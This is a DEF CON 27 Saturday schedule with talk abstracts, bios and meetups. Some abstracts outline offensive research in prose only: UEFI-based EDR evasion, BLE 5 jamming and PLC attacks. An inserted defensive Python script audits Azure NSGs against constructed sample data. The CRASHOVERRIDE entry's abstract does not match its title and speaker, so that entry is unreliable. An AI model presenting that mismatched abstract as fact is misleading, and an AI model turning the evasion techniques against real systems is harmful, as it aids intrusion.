Emilio Couto (@ekio_jp) is a Security Consultant with more than 20 years of experience in the network and security field. Born and raised in Argentina, he is currently located in Japan, where multitasking between language, culture and technologies is a must. Over the last decade he has focused mainly on Finance IT and on presenting tools at conferences (BlackHat Asia, HITB, AV Tokyo, SECCON and HamaSec). In his spare time he enjoys 3D printing, tinkering with electronics and home-made IoT devices.



 

DC - Paris - Track 3 - Saturday - 16:00-16:30


Confessions of an Nespresso Money Mule: Free Stuff & Triangulation Fraud

Saturday at 16:00 in Track 3
20 minutes

Nina Kollars Associate Professor Naval War College Strategic and Operational Research Department

Kitty Hegemon

In 2018 I somewhat innocently bought very expensive coffee (Nespresso capsules) online from Ebay. What followed was a series of unexpected additional packages from the manufacturer Nespresso and a lurking suspicion that something had gone terribly--if not criminally--wrong as a result of my purchase. This talk chronicles the obnoxious amounts of obsessive research and tracking that became my new hobby--stalking Nespresso fraudsters and my decidedly non-technical attempts at developing a generic search profile and reporting the fraudsters to anyone who would listen, to include : the persons whose identities had been stolen, Nespresso, Ebay, and the FBI. Ultimately I just ended up with a LOT of coffee; a lingering sense that I had committed several crimes; and no faith left in humanity.

Nina Kollars
Nina Kollars is writing a book about the ways in which hackers contribute to national security. She is a political scientist whose main research is in technological adaptation by users. Kollars is Associate Professor for the Naval War College in the Strategic and Operational Research Department. She conducts research on military weapons and the humans who use them. Largely unsatisfied with sitting still, Kollars has also worked for the Library of Congress' Federal Research Division, the Department of Afro-American Studies at Harvard University, the World Bank, an anti-glare coating factory on the third shift, and volunteers for BSides. She is the former viceroy of the DC strategy group Cigars, Scotch, and Strategy. She is also a certified bourbon steward.

Twitter: @nianasavage



 

DL - Planet Hollywood - Sunset 3 - Saturday - 10:00 - 11:50


Cotopaxi: IoT Protocols Security Testing Toolkit

Saturday from 10:00 – 11:50 in Sunset 3 at Planet Hollywood
Audience: IoT, AppSec

Jakub Botwicz

Cotopaxi is a set of tools for security testing of Internet of Things devices that use specific IoT/IIoT/M2M network protocols (e.g. CoAP, MQTT, DTLS, mDNS, HTCPCP). These tools can be used by penetration testers or security researchers to identify IoT services and verify security vulnerabilities or misconfigurations. Currently available security testing tools, like nmap or OpenVAS, do not support all of the new IoT protocols, so the possibilities for testing IoT products and discovering such devices in tested networks are limited. We are working to fill this gap with the Cotopaxi toolkit. The main features of our toolkit are:

- Checking availability of network services for supported IoT protocols at given IPs and port ranges ("service ping")
- Recognizing the software used by remote network server ("IoT software fingerprinting") based on responses for given messages using machine learning classifier
- Discovering resources identified by given URLs ("dirbusting")
- Performing black-box fuzzing of IoT protocols based on corpus of packets prepared using coverage-based fuzzer
- Identifying known vulnerabilities in IoT servers
- Detecting network traffic amplification.

New features in release for Defcon27 are:

- client-side versions of protocol fuzzer and vulnerability tester
- support for new protocols: SSDP and HTCPCP.

https://github.com/Samsung/cotopaxi

Jakub Botwicz
Jakub Botwicz works as a Principal Security Engineer at the Samsung Poland R&D Center, leading a team of security researchers. He has more than 15 years of experience in information security and previously worked at one of the world's leading payment card service providers, a Big4 consulting company and a vendor of network encryption devices. Jakub holds a PhD degree from the Warsaw University of Technology and multiple security community certificates including GWAPT, CISSP and ECSA. Currently, he provides security assessments (static and dynamic analyses) of different mobile and IoT components. His hobbies are rock climbing and mountaineering (especially on volcanoes!).



 

ICS - Bally's Event Center - Saturday - 13:30-13:59


CRASHOVERRIDE: Re-Assessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack

August 10, 2019 1:30 PM

In this presentation I will walk you through the EtherNet/IP frame and show some of the hidden gems within. Particularly, I will focus on the Allen-Bradley Micrologix controllers and how they communicate over EtherNet/IP. There will be live attacks showing vulnerabilities I discovered recently, including password retrieval, password bypass, remote crash, memory erase, and others. Welcome to 1998!

Speaker Information

Panelist Information

Joe Slowik

Dragos

Joe Slowik currently hunts ICS-targeting adversaries at Dragos. Prior to this, Joe ran the incident response team at Los Alamos National Laboratory and served as an Information Warfare Officer in the US Navy.



 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 16:00-16:45


4:00 PM: Cyberbiosecurity & the "Full Stack Biotechnologist"
Speaker: Steve Lewis

Abstract: At the intersection of biotechnology and technology there are emerging information security and biosecurity (Cyberbiosecurity) considerations worth exploring in the context of design, manufacturing, automation, and AI. Never before in history has an individual had the opportunity to learn such a diverse range of skills. This presentation explores the intersections of the world's most advanced (bio)technologies in the context of Cyberbiosecurity and the myriad tools of the full stack biotechnologist.

Speaker Bio: Steve works for Merrick & Company supporting the Department of Homeland Security with biosecurity and laboratory operational planning for the National Bio and Agro-defense Facility. He holds an M.S. in Biotechnology from Johns Hopkins and is a member of the Inworks community bio lab in Denver, CO.

T: @dontmindsteve


 

Night Life - Paris - Lobby Bar, under the blue thing - Saturday - 19:00-21:59


Title:
Dallas Hackers Party



 

Night Life - Planet Hollywood - Suite TBA - Saturday - 20:00-24:59


Title:
DC801 Party

@DC801


 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 10:50-11:30


COMPREHENSIVE TALK

DECEPTICON: OPSEC to Slow the OSINT

1050 - 1130



 

Meetups - Paris - Outside at base of Eiffel Tower - Saturday - 06:00-06:59


Title:
DEFCON 27 4X5K run

DEF CON 27 Let's go for a run 4X5K Announcement
The 4X5K is returning to DefCon 27. Come running, because maybe you like your mornings sweaty! 0530 is the perfect time to either wind down your evening or start up your day! 0600 is of course the coolest time for a run in Vegas (It's only 80!) But who really cares, running is fun, let's go for a run!

Meet up at 0600 (6 AM) at the base of the Paris Hotel and Casino Eiffel tower outside on Thursday-Sunday (8/9-8/12/2019) for a 5.1K fun run. The run departs at 0610. We've got two pace groups. The fast group is for people that run an average pace of around 9:00-minute miles or better. If you run slower than an average pace of 9:00-minute miles you're in the not-fast group. This is basically so everyone ends up in the same place at the end. At either pace, do it all four days and it's a half marathon (21K).

Routes will vary but will most likely be strip-centric. Printed route maps will be displayed before the run.

Safety Brief: It's Vegas, weird stuff will happen, it always does. Be aware that wet concrete is super slippery, broken glass is not your friend, and randos abound! If people harass you, just keep running. You are fast, and they are lame. Some random people may want to join in. This is cool, until it's not. Watch for traffic along the route. It's going to be hot. Hydrate before, during, and after. There can be a surprising number of stairs to climb on these runs, especially when we run south along the strip. Help each other out. Don't die.

The organizers (of which there are very few) are interested in talking to sponsors and past attendees about how we can awesome up this event. We're looking at you, fitness tracker companies: maybe we'll stop dropping 0days if you buy us some water and bananas.

I will see you there.

Follow @Agent __ X __ & @whereiskurt on Twitter for updates, and follow the hashtag #DEFCON4X5K


 

Night Life - Paris - Chateau Nightclub - Saturday - 21:00-26:59


Title:
DEFCON Monero Party

In 2017 and 2018, the Monero Enterprise Alliance reached out to the privacy lovers of Defcon and hosted an open house for a few hundred friends and supporters. That party sparked the 2018 Defcon BCOS/Monero Village, which led to 2019 MoneroKon. Now, the 2019 Monero Village and @BCOSvillage are their own separate villages at Defcon 27. Originally, I just wanted to get people together for a drink. :) But people keep wanting to celebrate, so here we go again!
. . .
Full Announcement and DJ schedule HERE

 

Meetups - Bally's - Chillout room near Vendor Area - Saturday - 13:00-14:59


Title:
DEFCON Sticker Swap

DEF CON Sticker Swap
The Very Unofficial @defcon Sticker Swap will be held at Bally's in the chillout room adjacent to the vendor area Saturday, 1-3pm.

We have some stickers to hand out, but we're counting on you to show up with your own! #DIY #stickerlife @dcstickerswap


 

DC - Paris - Track 2 - Saturday - 12:00-12:45


Defeating Bluetooth Low Energy 5 PRNG for Fun and Jamming

Saturday at 12:00 in Track 2
45 minutes | Demo, Tool

Damien Cauquil (virtualabs) Senior Security Researcher @ Econocom Digital.Security

Bluetooth Low Energy version 5 was published in late 2016, but we still have no sniffer supporting this specific version (and not that many compatible devices either). The problem is that this new version introduces a new channel hopping algorithm that renders previous sniffing tools useless, as devices can no longer be attacked and connections can no longer be analyzed. This new algorithm is based on a brand new pseudo-random number generator (PRNG) that provides better collision avoidance while kicking out all of our good old sniffing tools.

Unless some random hacker manages to break this not-that-strong PRNG and upgrades his BLE sniffing tool to support this algorithm ;). In this talk, we will explain why this PRNG is vulnerable and how it can be easily defeated to sniff and jam communications between two BLE 5 devices. A new version of BtleJack will be released during this talk, providing an efficient way to sniff BLE 5 connections to our fellow IoT hacker family.

Damien Cauquil (virtualabs)
Damien is a senior security researcher who joined Digital Security in 2015 as the head of research and development. He discovered how wireless protocols can be fun to hack and quickly developed BtleJuice, one of the first Bluetooth Low Energy MitM frameworks, and BtleJack, a BLE swiss-army knife released in 2018.

Damien has presented at various security conferences including DEF CON, Hack In Paris, Chaos Communication Camp, Chaos Communication Congress, BruCon, Hack.lu, and a dozen times at Nuit du Hack, one of the oldest French hacking conferences.

Twitter: @virtualabs



 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 15:10-15:50


COMPREHENSIVE TALK

Derevolutionizing OS Fingerprinting: the cat and mouse game

1510 - 1550



 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 19:00-19:59


7:00 PM: Digital Medicine 101
Speaker: Jen Goldsack

Abstract: Technology is changing how we practice medicine. Sensors and wearables are getting smaller and cheaper, and algorithms are becoming powerful enough to predict medical outcomes. Yet despite rapid advances, healthcare lags behind other industries in truly putting these technologies to use. A major barrier to entry is the cross-disciplinary approach required to create such tools, requiring knowledge from many people across many fields. The talk aims to drive the field forward by unpacking that barrier, providing a "myth busting" session on the core concepts and terms that define digital medicine. The talk will use cartoons (woot!) to outline the security, ethical, regulatory, and legal issues developers must consider as digital medicine products go to market.

Speaker Bio: Jen Goldsack is the Executive Director of the Digital Medicine Society (DiMe). Jen spent several years at the Clinical Trials Transformation Initiative (CTTI), a public-private partnership cofounded by Duke and the FDA, where she led the development and implementation of several projects within CTTI's Mobile Program and was the operational co-lead on the first randomized clinical trial using the FDA's Sentinel System. Jen spent five years working in research at the Hospital of the University of Pennsylvania, first in Outcomes Research in the Department of Surgery and later in the Department of Medicine. More recently, she helped launch the Value Institute, a pragmatic research and innovation center embedded in a large academic medical center in Delaware. Jen earned her master's degree in chemistry from the University of Oxford, England, her master's in the history and sociology of medicine from the University of Pennsylvania, and her MBA from the George Washington University. Additionally, she is a certified Lean Six Sigma Green Belt and a Certified Professional in Healthcare Quality. Ms Goldsack is a retired athlete, formerly a Pan American Games Champion, Olympian and World Championship silver medalist.

T: @_DiMeSociety


 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 11:00-11:45


11:00 AM: DIY Medicine: The Ethics of Hacking Pharma
Speaker: Alex Pearlman

Abstract: I will present two case studies of groups using biohacking methods to create generic versions of two of the most widely prescribed and most expensive pharmaceuticals in America. I will explain their methods and motivations in the context of the crisis of distributive justice in the US healthcare system. I question the ethics of the delivery of pharmaceuticals to patients in the US and argue that biohackers are actually acting in a way that is morally acceptable, given the circumstances.

Speaker Bio: Alex Pearlman is a bioethicist and writer and is the Managing Director of the Institute for Ethics of Emerging Technologies. Her research focuses on biohacking, self-experimentation, and access to health technologies. She also writes about emerging policy issues in science for the mainstream press.

T: @lexikon1


 

DL - Planet Hollywood - Sunset 5 - Saturday - 12:00 - 13:50


Dr.ROBOT: Organized Chaos and the Shotgun Approach

Saturday from 12:00 – 13:50 in Sunset 5 at Planet Hollywood
Audience: Defense/Offense

Aleksandar Straumann & Jayson Grace

Companies are large, and the number of subdomains they expose is even larger. There are a number of tools to uncover subdomains an organization is exposing, but individually they do not give you the complete picture. In the event that you use multiple tools, you are given an overwhelming amount of data to piece together into an aggregate view. In this talk we introduce Dr.ROBOT, a domain reconnaissance tool that was developed to run a large variety of subdomain enumeration tools. It was designed to trivially incorporate new tools as they are released by leveraging Docker and Ansible. Dr.ROBOT has three stages: gathering, inspection, and publishing. In the gathering stage, it gathers as much information as it can and aggregates the results. In the inspection phase, it captures screenshots and other information regarding the target. Finally, in the publishing phase it sends the data gathered during the previous two phases to an endpoint for manual review. Dr.ROBOT was created to serve as a comprehensive source on subdomain exposure by gathering information from as many resources as possible. It is a versatile utility for bug bounty hunters, blue teams, red teams, and many others.

https://github.com/sandialabs/dr_robot

Aleksandar Straumann
Aleksandar recently received his Master's in Computer Science from the University of Minnesota Duluth. In addition to his studies, he works part time at Sandia National Labs as a graduate intern. He works on various projects involving penetration testing, reverse engineering, and tool development. A security enthusiast, he has also pursued certifications in web penetration testing and offensive security. Aleksandar enjoys practicing his skills with CTFs, developing tools, and working on projects to make the security community better.

Jayson Grace
Jayson Grace is a Security Engineer at Splunk. He holds a BS in Computer Science from the University of New Mexico (2016). He has previously worked as a tool developer, penetration tester, systems administrator, and DevOps Engineer. Passionate about empowering engineers to create secure applications, Jayson also enjoys hunting for 0-days, automating offensive security processes, and strongly believes that in-house offensive security researchers are essential to maintaining a secure environment.



 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 12:30-14:30


12:30 PM: Dr/Hacker Panel
Speakers:
Dr. Harish Manyam
Hussein Syed
Dr. Dale Yoo

Abstract: Evaluating the clinical impact of a vulnerability has significant implications for how the vulnerability is handled both pre- and post-disclosure, including how it is communicated to physicians and patients. Open and transparent communication between the clinical and security researcher communities is essential to ensure that researchers understand the impact that medical device vulnerabilities will have on patient health and safety, and that clinicians have a better understanding of the security implications so they can recommend an appropriate response for their patients. This panel, which includes medical security researchers, practicing physicians and healthcare technologists, will discuss the challenges of evaluating the clinical impact of medical device technologies and the opportunities for researchers and healthcare professionals to work more closely together.

Speaker Bio:
Dr. Manyam received his training at Case Western Reserve University Hospitals (2012-2014) and stayed there as faculty and Assistant Professor of Medicine from 2013-2016. He served as the Head of the Lead Extraction Program at University Hospitals Case Western Reserve prior to joining the UT Cardiology group. He serves as the Director of Cardiovascular Research and the Head of the Atrial Fibrillation Center at Erlanger. He is actively involved with multiple research trials including monitoring the recurrence of atrial fibrillation, optimizing programming options in patients with biventricular defibrillators, and the assessment of lead extraction risk. He has extensive experience in complex ablation (atrial fibrillation and ventricular tachycardia), laser lead extraction, and device implantation.

Hussein Syed is the VP/CISO at RWJBarnabas Health System, an integrated healthcare delivery network in New Jersey. He is responsible for the organization's information security program. Hussein and his team are responsible for security management planning and execution to align with the strategic goals of the health system. Hussein has more than 25 years of experience in IT, of which 17 years are in information security. He has spoken and participated at various security events, RSA, Evanta, HIMSS, and Gartner.

Dr. Dale Yoo attended the University of Pennsylvania in Philadelphia for his undergraduate degree program with honors. He attended medical school at the University of Texas Health Science Center, San Antonio, TX. He completed his residency in Internal Medicine and his fellowships in Cardiovascular Disease, Cardiac Electrophysiology Research and Clinical Cardiac Electrophysiology, all at Emory University in Atlanta, GA. Dr. Yoo is proficient in all aspects of Electrophysiology including atrial fibrillation ablation, atrial flutter and PSVT ablation, ventricular tachycardia ablation, as well as complex congenital heart disease management and ablation. In addition, he implants pacemakers, defibrillators and cardiac resynchronization therapy devices. He is also one of only a handful of physicians trained to perform laser lead extraction in the Dallas area. Dr. Yoo not only practices electrophysiology, but is also board certified in Nuclear Cardiology and proficient in advanced heart failure management. He is also quite involved with clinical research and has developed and patented a post-operative atrial fibrillation drug.


 

Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 22:00-23:59


Title:
Drunk Hacker History

It's official. Drunk Hacker History will be back at @defcon for a 5th fabulous year!!!
Truthfully, we didn't think our livers would last this long.
Time to start preparing and developing a tolerance to those feats of strength!


 

Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 11:00-12:59


Title:
dstruction

No description available

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 13:00-13:45


Speaker: Tanya Janca & Teri Radichel

Twitter: @SheHacksPurple

Twitter: @TeriRadichel

Abstract: PenTesters, Blue & Red teamers, network admins and cloud enthusiasts, this talk will lay out from start to finish how to verify the security of your Azure implementation. This talk will be 80%+ demos of where to look, what to do, and how to prioritize what you find. Topics include: Azure Security Center, setting scope, setting policy, threat protection, and more.

Detailed Outline: There are two articles as well as a video we will share at the end to give the audience more information and a checklist of how they can assess their own Azure instances after the talk is over.

Here is the outline of what we plan to cover in this session:
Do not test the Azure Infrastructure. That is a violation of the user agreement for Azure and will get you into hot water with Microsoft. No one wants that.
Be extremely careful to only test things that are IN SCOPE for your client.
Is Azure Security Center turned on? If not, turn it on. I ❤ ASC.
Do all subscriptions/sub-subscriptions have it on? Do you have complete coverage? If not, definitely report it.
Is there a policy set (settings that the org has chosen as “secure”, such as all storage must be encrypted at rest)? If so, what are the settings? Do they look good? Also, what level of compliance do they have? Everything that is not compliant should be reported.
Is threat protection (storage and databases only), monitoring and auditing set up on every possible resource? If not, report it.
Look at the network, in the same way you would look at a traditional network, is anything out of place? Also, are they doing Zoning or Zero-trust or something else? Which network security model are they using? Make sure they are compliant with their own plan. Ask them what their plan is for their network to start. If they don't have an answer, that's another issue altogether.
Do they have "just in time" (JIT) set up on all ports on all servers/VMs? Or are they using a JumpBox to access VMs from outside Azure? Or is that not allowed at all? They should use JIT and Network Security Groups (NSGs) for *everything*.
Do they have app whitelisting enabled on VMs? It's called Adaptive Application Controls, and it's right underneath JIT in the security center (ASC) menu, under "Advanced Cloud Defense". They should have that turned on for *all* servers.
Are they using a SIEM (Security incident and event management system)? Are they using it well? Are they monitoring it? What kind of coverage is it getting? Does ASC feed into it? It should.
Are they using a WAF (Web Application Firewall)? If so, test it. If they aren't, mark it as advice for improvement.
Any other 3rd party security tools (IPS/IDS/HIPS/Other)? If so, are those getting complete coverage of all assets that are covered by this test? And are they configured well?
Look in the "Recommendations" tab of Azure Security Center and it will tell you all the problems (network issues, config errors, missing patches, more) that you haven't spotted yet. 😊 Really, you could likely start here. This is a list of everything that is not compliant with your policy, in order of importance.
If you are assessing web apps within Azure, APIs and functions (serverless), that's a whole other topic, but all of the regular security testing rules would apply, Azure or not.
If your org is using Azure DevOps, I suggest adding several security tests to your pipeline, including the Azure Secure DevOps Kit. It's strict; you likely won't pass the first few times around, so prepare your developers for a bit of disappointment. There are a TON of great security tools in the Azure Marketplace; add a few, one is not enough.

Turn on VA for SQL Databases as part of Azure Threat Protection, and kick off a scan right away to see if anything is happening. It will likely have a lot of advice for you.
Look in the Threat Detection part of Security Center and verify that there are no active or recent attacks; investigate accordingly.
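A worked example of the NSG review step, added here and not part of the talk: it walks each NSG's inbound rules in priority order (lower number wins, which is how Azure evaluates them) and reports management ports that a permanent rule leaves open to the whole internet, which is exactly what JIT access is meant to replace. The JSON shape is what `az network nsg list -o json` returns; the SAMPLE data, NSG names and rule names are constructed for the example.

```python
"""Added example: triage Azure NSGs like a traditional firewall.

Input shape follows `az network nsg list -o json` (securityRules and
defaultSecurityRules with priority/direction/access/protocol/source
prefixes/destination ports). SAMPLE is constructed, not real output.
"""
import ipaddress
import json

MGMT_PORTS = {22: "ssh", 3389: "rdp", 5985: "winrm", 5986: "winrm-https"}
INTERNET_TAGS = {"*", "internet"}  # NSG wildcard and the Internet service tag

SAMPLE = json.loads('''[
 {"name": "web-nsg",
  "securityRules": [
   {"name": "allow-https", "priority": 100, "direction": "Inbound", "access": "Allow",
    "protocol": "Tcp", "sourceAddressPrefix": "Internet", "sourceAddressPrefixes": [],
    "destinationPortRange": "443", "destinationPortRanges": []},
   {"name": "allow-ssh-any", "priority": 110, "direction": "Inbound", "access": "Allow",
    "protocol": "*", "sourceAddressPrefix": "*", "sourceAddressPrefixes": [],
    "destinationPortRange": "22", "destinationPortRanges": []}],
  "defaultSecurityRules": [
   {"name": "DenyAllInBound", "priority": 65500, "direction": "Inbound", "access": "Deny",
    "protocol": "*", "sourceAddressPrefix": "*", "sourceAddressPrefixes": [],
    "destinationPortRange": "*", "destinationPortRanges": []}]},
 {"name": "db-nsg",
  "securityRules": [
   {"name": "deny-rdp-internet", "priority": 100, "direction": "Inbound", "access": "Deny",
    "protocol": "Tcp", "sourceAddressPrefix": "Internet", "sourceAddressPrefixes": [],
    "destinationPortRange": "3389", "destinationPortRanges": []},
   {"name": "allow-mgmt-from-office", "priority": 200, "direction": "Inbound", "access": "Allow",
    "protocol": "Tcp", "sourceAddressPrefix": null, "sourceAddressPrefixes": ["203.0.113.0/24"],
    "destinationPortRange": null, "destinationPortRanges": ["3389", "5985-5986"]}],
  "defaultSecurityRules": [
   {"name": "DenyAllInBound", "priority": 65500, "direction": "Inbound", "access": "Deny",
    "protocol": "*", "sourceAddressPrefix": "*", "sourceAddressPrefixes": [],
    "destinationPortRange": "*", "destinationPortRanges": []}]}
]''')


def rule_ports(rule):
    ranges = list(rule.get("destinationPortRanges") or [])
    if rule.get("destinationPortRange"):
        ranges.append(rule["destinationPortRange"])
    return ranges


def port_in(port, ranges):
    """True if `port` falls in any range ("*", "22", "5985-5986")."""
    for r in ranges:
        if r == "*":
            return True
        lo, _, hi = r.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def rule_sources(rule):
    srcs = list(rule.get("sourceAddressPrefixes") or [])
    if rule.get("sourceAddressPrefix"):
        srcs.append(rule["sourceAddressPrefix"])
    return srcs


def source_is_internet(srcs):
    """True if a prefix admits arbitrary internet hosts: '*', the Internet
    service tag, or a /0. Other service tags (VirtualNetwork, ...) and
    scoped CIDRs do not count."""
    for s in srcs:
        if s.lower() in INTERNET_TAGS:
            return True
        try:
            if ipaddress.ip_network(s, strict=False).prefixlen == 0:
                return True
        except ValueError:
            continue
    return False


def first_match(nsg, port, proto="Tcp"):
    """Walk inbound rules in priority order and return the first one that
    matches a packet from an arbitrary internet host to `port`. Rules scoped
    to specific prefixes are skipped, so a Deny for one CIDR does not hide a
    later Allow-from-anywhere."""
    rules = list(nsg.get("securityRules") or []) + list(nsg.get("defaultSecurityRules") or [])
    inbound = sorted((r for r in rules if r["direction"] == "Inbound"), key=lambda r: r["priority"])
    for r in inbound:
        if r["protocol"] in ("*", proto) and port_in(port, rule_ports(r)) \
                and source_is_internet(rule_sources(r)):
            return r
    return None


def exposed_mgmt_ports(nsgs):
    """{nsg name: {port: rule name}} for management ports open to the internet."""
    findings = {}
    for nsg in nsgs:
        for port in MGMT_PORTS:
            r = first_match(nsg, port)
            if r is not None and r["access"] == "Allow":
                findings.setdefault(nsg["name"], {})[port] = r["name"]
    return findings


if __name__ == "__main__":
    for name, ports in exposed_mgmt_ports(SAMPLE).items():
        for port, rule in ports.items():
            print(f"{name}: {MGMT_PORTS[port]}/{port} open to the internet by rule '{rule}'"
                  " -> close it and use JIT access instead")
```

Feed it the real output of `az network nsg list -o json` instead of SAMPLE and every finding is a port that should be closed and opened on demand through JIT; the db-nsg rule scoped to one office range is deliberately not flagged, since the question here is exposure to the whole internet.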

About Tanya: Tanya Janca, also known as SheHacksPurple, is a senior cloud advocate for Microsoft, specializing in application and cloud security; evangelizing software security and advocating for developers and operations folks alike through public speaking, her open source project OWASP DevSlop, and various forms of teaching via workshops, blogs, public speaking and community events. As an ethical hacker, OWASP Project Leader, Women of Security (WoSEC) chapter leader, software developer and professional computer geek of 20+ years, she is a person who is truly fascinated by the 'science' of computer science.

About Teri: Teri has helped thousands of companies with cloud security through consulting, writing, research, and training. She moved a web hosting business to the cloud and then started the Seattle AWS Architects and Engineers Meetup in 2013, which now has over 2500 members. She was on the original team that helped Capital One move production workloads to AWS. Another company recruited her to help them move to the cloud. She led a team of 30 people in two countries, architected a SaaS IoT solution on AWS and delivered a secure CI/CD pipeline based on her whitepaper, Balancing Security and Innovation with Event Driven Automation. She then moved into security research, writing articles for publications such as Dark Reading and Infosecurity Magazine and reverse engineering malware. When someone told her packet capture was not possible in the cloud, she wrote a white paper, Packet Capture on AWS, proving that it was.
Teri has presented on cloud security at major security conferences including RSA, AWS re:Invent, Countermeasure, SANS Networking, SANS Cloud Summit, and BSides. She is an IANS Faculty member and received the SANS Difference Makers Award for security innovation. Teri has 25 years of professional technical experience including software architecture and engineering, cyber security, and business operations. She was on the initial SANS cloud security advisory board and provided information and updates for the SANS cloud curriculum. She taught the cloud security class for SANS Institute in 2018. She holds a business degree from the University of Washington, a Master of Software Engineering from Seattle University, and is currently finishing a Master of Information Security Engineering from SANS Institute. She got started with computers when she taught herself to program on a TI99/4A when she was 12 years old.



CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 16:00-16:59


Easy PAKE Oven

No description available



DC - Paris - Track 4 - Saturday - 10:00-10:45


EDR Is Coming; Hide Yo Sh!t

Saturday at 10:00 in Track 4
45 minutes | Demo, Tool

Michael Leibowitz Principal Troublemaker

Topher Timzen (@TTimzen), Principal Vulnerability Enthusiast

There’s a new, largely unaddressed threat in the security industry today, Endpoint Detection and Response (EDR), which aims to stop threat actors in their tracks. The scenario plays out like this... At first your campaign is going well and your attacker objectives are being met. Then, your lovingly crafted payloads become analyst samples, you’re evicted from the environment and you lose your persistence. You and the analyst are now having a bad time. You may feel this is just fear mongering, but we assure you, the risk is real. Fortunately, we have a few new tricks up our sleeves to keep this nightmare scenario at bay. While many would have you believe that we live in a measured and signed boot Utopia on modern systems, we will show you the seedy underbelly of this Brave New World. By abusing early boot mechanisms and UEFI platform firmware, we are able to evade common detection. By showing up early to the fight, we sucker punch EDR, leaving it in a daze, unable to see our malicious activities. We put a new twist on old code injection techniques and maintain persistence in UEFI firmware, making an effective invisibility cloak. By leveraging these two techniques, you and the analyst can have a happy and relaxing evening. From that point on, the good ol’ days are back again! Plunder away!

Michael Leibowitz
Michael (@r00tkillah) has done hard-time in real-time. An old-school computer engineer by education, he spends his days hacking the mothership for a Fortune 100 company. Previously, he developed and tested embedded hardware and software, fooled around with strap-on boot ROMs, mobile apps and office suites, and wrote some secure software. On nights and weekends he hacks on electronics, writes CFPs, and contributes to the NSA Playset.

Twitter: @r00tkillah

Topher Timzen
Topher Timzen (@TTimzen) is currently a Principal Vulnerability Enthusiast and enjoys causing constructive mischief. Topher has spoken at conferences such as DEF CON, SecTor and BSidesPDX on offensive security research. Enjoying teaching, particularly about exploitation, he has been running the CTF at BSidesPDX for the past few years. Topher is located in the woods hiking or mountain biking when not computing. Collectively they have pretended to be bears, slayed a dragon or two, and have managed to not bring down a production server (for long). In reality, they just want to write malware.

Twitter: @Ttimzen



ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 14:00-14:59


Title:
Ethical Issues In Cyber Attribution



BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 17:00-17:30


Extending Zeek For ICS Defense

Saturday 17:00, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@v4tl4 currently works as a security engineer. He has spent the last three years developing signatures for detecting threats on the network. Prior to that he was a SOC analyst.

@jamesdickenson has worked as a security engineer for five years focusing on detection engineering, threat intel and network security monitoring.

Industrial Control System (ICS) protocols are often neglected in the realm of network security monitoring. Detecting, parsing, and finding malicious activity can be frustrating and time consuming. In this session we will share our learning experiences building detections and protocol parsers in Zeek. We will discuss how ICS protocols can be parsed using the Zeek network security monitor to hunt for malicious patterns and generate detections for your Security Information and Event Management (SIEM) tools. This talk is for those that have ICS protocols in their environments and want greater insight into ICS network traffic.



RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 11:30-11:55


LIGHTNING TALK

Finding the needle in the twitter haystack.

1130 - 1155



BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 11:45-12:30


11:45 AM: Forensic Science and Information Security: Lifetime Lovers, Part-time Friends
Speaker: Najla Lindsay

Abstract: Forensic Science and Information Security are very parallel fields. They are both methodical in nature, and often one area builds succinctly on top of the other. With the ability to have a specialty in various areas, it is interesting that the two do not often merge together and share policies and procedures. You see, forensic scientists are often called in at the endpoint. Usually it is at the scene of a crime; they are given only the final product and must work backwards to build a story for what initially happened. In Information Security, with the rapid growth of exposure to data, specifically PHI, it is evident that it would be beneficial for both communities to work together. With my area of extended knowledge and expertise in Forensic and Clinical Toxicology, I am often met with various attempts to social engineer me out of patient results, to having sent incorrect reports to clients (not on purpose of course). In a Toxicology lab, whether government (local, state or federal) or private, PHI is the utmost important issue. Scientists adhere to the policies and procedures of the SCIENTIFIC aspect of the organization, but not always to the INFORMATION SECURITY aspect of the organization. Let's chat a little about how to make both industries more aware of how they are really Lifetime Lovers and Part-time Friends.


Speaker Bio: Najla is a Penn State Grad with a technical background in Forensic Science. She works in the area of Forensic & Clinical Toxicology, more specifically drug testing for various specimen types (urine, blood and oral fluid). She is a criminal show junkie, avid thrill seeker and traveler and wine explorer. She is currently transitioning into the hacking specialty of security and labels herself as Pentester Neophyte. You can follow her journey on twitter using these hashtags: #ToxicologyToOSCP and #ScientistToHacker. Her website/blog, forensicsandinfosec.tech is focused on forensics and information security.
T: @teamvega


Meetups - Planet Hollywood - Santa Monica 4 Room - Saturday - 12:00-12:59


Title:
Friends of Bill W.

For all those Friends of Bill W. looking for a meeting or just a quiet moment to regroup, we have you covered with meetings throughout #DEFCON - Noon & 5pm Thurs-Sat, Noon Sun. The location is SANTA MONICA 4 in Planet Hollywood.

Meetups - Planet Hollywood - Santa Monica 4 Room - Saturday - 17:00-17:59


Title:
Friends of Bill W.

For all those Friends of Bill W. looking for a meeting or just a quiet moment to regroup, we have you covered with meetings throughout #DEFCON - Noon & 5pm Thurs-Sat, Noon Sun. The location is SANTA MONICA 4 in Planet Hollywood.

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 15:50-16:15


LIGHTNING TALK

From email address to phone number

1550 - 1615



BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 11:10-11:35


FumbleChain: A Purposefully Vulnerable Blockchain

No description available



Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire II - Saturday - 10:00-13:59


Functional Programming for the Blue Team

Saturday, 1000-1400 in Flamingo, Valley of Fire II

eigentourist Software Engineer, Data Scientist

This is an introduction to functional programming concepts. It's not an intro to a language or a tool, but to a set of ideas. It's a powerful one for any hacker to learn, but especially for blue teamers who find themselves writing or maintaining increasingly complex code. Practicing it can help defenders write safer code that scales well.

Why speak particularly toward blue team?

